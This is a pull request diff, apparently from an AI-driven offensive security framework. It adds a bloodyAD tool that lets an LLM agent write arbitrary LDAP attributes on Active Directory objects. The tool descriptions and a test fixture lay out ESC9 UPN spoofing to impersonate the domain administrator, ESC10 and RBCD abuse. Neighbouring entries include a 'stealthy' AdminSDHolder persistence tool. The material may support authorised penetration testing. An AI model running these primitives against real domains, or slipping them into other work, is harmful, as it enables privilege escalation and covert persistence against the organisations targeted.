### PR TITLE
feat: add bloodyAD single attribute modification primitive

### DIFF
--- a/ares-llm/src/tool_registry/acl.rs
+++ b/ares-llm/src/tool_registry/acl.rs
@@ -109,6 +109,54 @@ pub(super) fn tool_definitions() -> Vec<ToolDefinition> {
             }),
         },
         ToolDefinition {
+            name: "bloodyad_set_object_attr".into(),
+            description: "Set a single LDAP attribute on an AD object via \
+                `bloodyAD set object`. Primary use cases: ESC9 (set \
+                `userPrincipalName` to `administrator@<domain>` on a user we \
+                have GenericAll on, then request cert with the spoofed UPN, \
+                then restore the original UPN); ESC10 Case 2 (clear \
+                `userPrincipalName` so the implicit cert-mapping rule binds \
+                to administrator); RBCD (write \
+                `msDS-AllowedToActOnBehalfOfOtherIdentity` on a victim \
+                computer); any other primitive where the LLM needs to write \
+                ONE attribute without granting itself a DACL right first."
+                .into(),
+            input_schema: json!({
+                "type": "object",
+                "properties": {
+                    "target": {
+                        "type": "string",
+                        "description": "SAMAccountName or DN of the AD object whose attribute we're modifying."
+                    },
+                    "attribute": {
+                        "type": "string",
+                        "description": "LDAP attribute name (e.g. `userPrincipalName`, `userAccountControl`, `servicePrincipalName`, `msDS-AllowedToActOnBehalfOfOtherIdentity`)."
+                    },
+                    "value": {
+                        "type": "string",
+                        "description": "New value to write. For text attributes, the literal string. For binary attributes (e.g. security descriptors), the hex-encoded bytes bloodyAD expects via its `-v` flag."
+                    },
+                    "domain": {
+                        "type": "string",
+                        "description": "Target domain FQDN"
+                    },
+                    "username": {
+                        "type": "string",
+                        "description": "Username for authentication (must have WriteProperty on the target attribute)."
+                    },
+                    "password": {
+                        "type": "string",
+                        "description": "Password for authentication"
+                    },
+                    "dc_ip": {
+                        "type": "string",
+                        "description": "Domain controller IP address"
+                    }
+                },
+                "required": ["target", "attribute", "value", "domain", "username", "password", "dc_ip"]
+            }),
+        },
+        ToolDefinition {
             name: "adminsd_holder_add_ace".into(),
             description: "Add an ACE via AdminSDHolder to gain persistent privileged access. The SDProp process propagates AdminSDHolder's DACL to all protected groups (Domain Admins, Enterprise Admins, etc.) every 60 minutes, providing a stealthy persistence mechanism.".into(),
             input_schema: json!({

--- a/ares-tools/src/acl.rs
+++ b/ares-tools/src/acl.rs
@@ -279,6 +279,44 @@ pub async fn pygpoabuse_immediate_task(args: &Value) -> Result<ToolOutput> {
         .await
 }
 
+/// Modify an arbitrary attribute on an AD object via `bloodyAD set object`.
+///
+/// Required args: `domain`, `username`, `password`, `dc_ip`, `target`,
+/// `attribute`, `value`.
+///
+/// `target` is the SAM account name or DN of the object being modified.
+/// `attribute` is the LDAP attribute name (e.g. `userPrincipalName`,
+/// `userAccountControl`, `servicePrincipalName`).
+/// `value` is the new value to write.
+///
+/// Used by ESC9 (UPN spoofing — set `userPrincipalName` to
+/// `administrator@<domain>` on a user we have GenericAll on), ESC10
+/// Case 2 (clear `userPrincipalName` to bypass implicit cert mapping),
+/// and any other primitive where the LLM needs to write a single
+/// attribute without granting itself a DACL right first.
+pub async fn bloodyad_set_object_attr(args: &Value) -> Result<ToolOutput> {
+    let domain = required_str(args, "domain")?;
+    let username = required_str(args, "username")?;
+    let password = required_str(args, "password")?;
+    let dc_ip = required_str(args, "dc_ip")?;
+    let target = required_str(args, "target")?;
+    let attribute = required_str(args, "attribute")?;
+    let value = required_str(args, "value")?;
+
+    let creds = credentials::bloodyad_creds(domain, username, password, dc_ip);
+
+    CommandBuilder::new("bloodyAD")
+        .args(creds)
+        .arg("set")
+        .arg("object")
+        .arg(target)
+        .arg(attribute)
+        .flag("-v", value)
+        .timeout_secs(60)
+        .execute()
+        .await
+}
+
 /// Edit DACLs via `dacledit.py`.
 ///
 /// Required args: `domain`, `username`, `password`, `dc_ip`, `principal`, `rights`, `target_dn`
@@ -924,6 +962,55 @@ mod tests {
             "dc_ip": "192.168.58.1", "target_dn": "CN=Users,DC=contoso,DC=local", "principal": "jsmith"
         });
         assert!(super::bloodyad_add_genericall(&args).await.is_ok());
+    }
+
+    #[tokio::test]
+    async fn bloodyad_set_object_attr_executes() {
+        mock::push(mock::success());
+        // ESC9-style invocation: spoof a victim user's UPN to the
+        // built-in administrator so a certipy-issued cert authenticates
+        // as administrator.
+        let args = json!({
+            "domain": "contoso.local",
+            "username": "alice",
+            "password": "P@ssw0rd!",   // pragma: allowlist secret
+            "dc_ip": "192.168.58.10",
+            "target": "victim_user",
+            "attribute": "userPrincipalName",
+            "value": "administrator@contoso.local"
+        });
+        assert!(super::bloodyad_set_object_attr(&args).await.is_ok());
+    }
+
+    #[test]
+    fn bloodyad_set_object_attr_requires_all_fields() {
+        // Each missing field should error — confirms the schema is enforced
+        // by `required_str` at the implementation level (defence in depth
+        // against the LLM omitting fields the JSON schema also requires).
+        for field in &[
+            "domain",
+            "username",
+            "password",
+            "dc_ip",
+            "target",
+            "attribute",
+            "value",
+        ] {
+            let mut args = json!({
+                "domain": "contoso.local",
+                "username": "alice",
+                "password": "P@ssw0rd!",   // pragma: allowlist secret
+                "dc_ip": "192.168.58.10",
+                "target": "victim_user",
+                "attribute": "userPrincipalName",
+                "value": "administrator@contoso.local"
+            });
+            args.as_object_mut().unwrap().remove(*field);
+            assert!(
+                required_str(&args, field).is_err(),
+                "expected required_str({field}) to error"
+            );
+        }
     }
 
     #[tokio::test]

--- a/ares-tools/src/lib.rs
+++ b/ares-tools/src/lib.rs
@@ -199,6 +199,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result<ToolOutput> 
         "bloodyad_add_group_member" => acl::bloodyad_add_group_member(arguments).await,
         "bloodyad_set_password" => acl::bloodyad_set_password(arguments).await,
         "bloodyad_add_genericall" => acl::bloodyad_add_genericall(arguments).await,
+        "bloodyad_set_object_attr" => acl::bloodyad_set_object_attr(arguments).await,
         "adminsd_holder_add_ace" => acl::adminsd_holder_add_ace(arguments).await,
         "gmsa_read_password_bloodyad" => acl::gmsa_read_password_bloodyad(arguments).await,
         "pywhisker" => acl::pywhisker(arguments).await,


### PR DESCRIPTION
**Key Changes:**

- Introduced a new primitive to set a single LDAP attribute on an AD object via bloodyAD
- Added schema and tool definition for `bloodyad_set_object_attr` in the tool registry
- Implemented corresponding async function and tests for attribute modification
- Integrated new primitive into the main tool dispatcher

**Added:**

- Single attribute modification tool - Defined `bloodyad_set_object_attr` in `tool_registry/acl.rs` with schema covering use cases like ESC9, ESC10 (case 2), and RBCD, allowing targeted LDAP attribute changes (e.g., spoofing `userPrincipalName` or modifying `msDS-AllowedToActOnBehalfOfOtherIdentity`)
- Implementation of attribute modification - Added `bloodyad_set_object_attr` async function in `ares-tools/src/acl.rs` to invoke bloodyAD for setting a specific attribute on a target object, handling all required fields and credentials
- Test coverage for new primitive - Added async test to ensure `bloodyad_set_object_attr` executes as expected, plus a unit test to confirm all required fields are validated and enforced

**Changed:**

- Tool dispatcher integration - Updated `dispatch` function in `ares-tools/src/lib.rs` to include routing for the new `bloodyad_set_object_attr` primitive, enabling its use through the standard dispatch interface